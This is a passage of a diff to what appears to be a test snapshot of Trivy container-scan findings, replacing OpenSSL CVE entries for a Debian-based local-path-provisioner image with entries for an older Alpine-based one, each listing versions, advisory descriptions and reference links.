- "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23840", + "installedVersion": "1.1.1g-r0", "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2021-23840", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-23840.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", + "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", + "name": "openssl: integer overflow in CipherUpdate", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://avd.aquasec.com/nvd/cve-2021-23840", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://access.redhat.com/security/cve/CVE-2021-23840", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Certificate policy check not enabled", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": "1.1.1k-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3450", + "installedVersion": "1.1.1g-r0", "packageName": "libssl1.1", "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3450", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", + "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3450.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://www.cve.org/CVERecord?id=CVE-2021-3450", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-08", + "https://www.tenable.com/security/tns-2021-09", ], }, "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "description": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", + "name": "openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", - }, - { - "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - }, - { - "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-3450", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://access.redhat.com/security/cve/CVE-2021-3450", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "libssl1.1", - "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", - ], - }, - "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: RSA authentication weakness", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://linux.oracle.com/cve/CVE-2021-3450.html", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://security.gentoo.org/glsa/202103-03", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", - ], - }, - "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3450", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://www.tenable.com/security/tns-2021-05", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://www.tenable.com/security/tns-2021-08", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://www.tenable.com/security/tns-2021-09", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", + "fixedVersion": "1.1.1l-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3712", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "https://access.redhat.com/security/cve/CVE-2021-3712", + "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + 